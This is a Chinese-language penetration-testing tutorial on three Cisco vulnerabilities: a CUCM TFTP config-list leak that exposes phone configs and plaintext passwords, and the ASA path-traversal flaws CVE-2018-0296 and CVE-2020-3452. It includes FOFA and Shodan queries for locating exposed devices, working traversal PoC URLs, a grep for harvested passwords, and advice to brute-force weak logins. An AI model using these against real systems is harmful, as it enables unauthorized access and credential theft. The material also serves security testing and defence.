CISCO-UCM ConfigFileCacheList.txt 洩漏
CISCO-UCM 全稱Cisco Unified Communications Manager,是用于內建CISCO的語音視訊通話、消息傳遞和移動協作的基礎設施
部分 CUCM 伺服器在端口 TCP/6970 上有一個 HTTP 服務,其中存在 ConfigFileCacheList.txt 檔案,包含位于 TFTP 目錄中的所有檔案名.
fofa語句
product=="CISCO-UCM" shodan語句
http.html:"Cisco Unified Communications Manager" payload
x.x.x.x:6970/ConfigFileCacheList.txt 在目标檔案中包含了許多SEP開頭的檔案,那是ip電話的配置檔案,sep後面接的是mac位址
Untitled
可以周遊下載下傳這個ConfigFileCacheList.txt檔案内容中的所有檔案
Untitled
在下載下傳的配置檔案中,包含ip,描述,端口等配置資訊
Untitled
甚至有的還會包含明文的賬号密碼
Untitled
可以用egrep批量查找
egrep -r 'Password' *.xml Untitled
在配置檔案中獲得了賬号密碼後,可以嘗試登入UCM的web背景
Untitled
當然這個 ConfigFileCacheList.txt 洩漏比較少見,如果遇到UCM可以試試通路/cucm-uds/users路徑,可以洩漏使用者名資訊,再針對使用者名進一步爆破弱密碼
Untitled
CVE-2018-0296 Cisco ASA 目錄周遊漏洞
Cisco ASA是思科的防火牆裝置,一般用于在企業邊界,包含了ips,avc,wse等應用功能。
fofa語句
app="CISCO-ASA-5520" 根據文章 https://www.anquanke.com/post/id/171916 中的描述,CVE-2018-0296在不同型号裝置上存在2種利用場景,一種是拒絕服務造成裝置崩潰重新開機,一種是目錄周遊獲得敏感資訊
在修複方案中則是增加了對./和../的處理邏輯,以防止目錄周遊
拒絕服務這裡就不具體測試了,主要看下目錄周遊的利用
檢測poc
/+CSCOU+/../+CSCOE+/files/file_list.json Untitled
注意,類似的poc不能在浏覽器裡直接粘貼通路,因為浏覽器會自動将通路的路徑類似/../解析為上一級目錄,也就是通路的為/+CSCOE+/files/file_list.json
列出 /sessions 目錄的内容
/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions Untitled
提取登入使用者的登入資訊
/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/[name] Untitled
CVE-2020-3452 Cisco ASA 目錄周遊漏洞
CVE-2020-3452漏洞可以在未驗證的情況下進行任意檔案讀取
該漏洞源于 ASA 和 FTD 的 web 服務接口在處理 HTTP 請求的 URL 時缺乏正确的輸入驗證,導緻攻擊者可以在目标裝置上檢視系統内的web目錄檔案。
此漏洞不能用于擷取對 ASA 或 FTD 系統檔案或底層作業系統 (OS) 檔案的通路,是以隻能讀取 web 系統目錄的檔案,比如 webvpn 的配置檔案、書簽、網絡 cookies、部分網絡内容和超文本傳輸協定網址等資訊。
作者在推特分享的檢測poc
https://twitter.com/aboul3la/status/1286141887716503553
/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ 讀取 /+CSCOE+/portal_inc.lua 檔案
Untitled
至于進一步利用,有研究人員給出了一些已知檔案清單
https://twitter.com/HackerGautam/status/1286652700432662528
https://raw.githubusercontent.com/3ndG4me/CVE-2020-3452-Exploit/master/cisco_asa_file_list.txt
不過實際測試,除了session.js 跑出了一個亂碼的内容以外,其他的檔案多是一些資源檔案,難以進一步利用。
Source & Reference
- • https://www.cisco.com/c/en/us/support/docs/unified-communications/unified-communications-manager-callmanager/200408-Retrieve-Phone-Configuration-File-from-T.html
- • https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86
- • https://www.trustedsec.com/blog/seeyoucm-thief-exploiting-common-misconfigurations-in-cisco-phone-systems/
- • https://sekurak.pl/opis-bledu-cve-2018-0296-ominiecie-uwierzytelnienia-w-webinterfejsie-cisco-asa/
- • https://www.anquanke.com/post/id/171916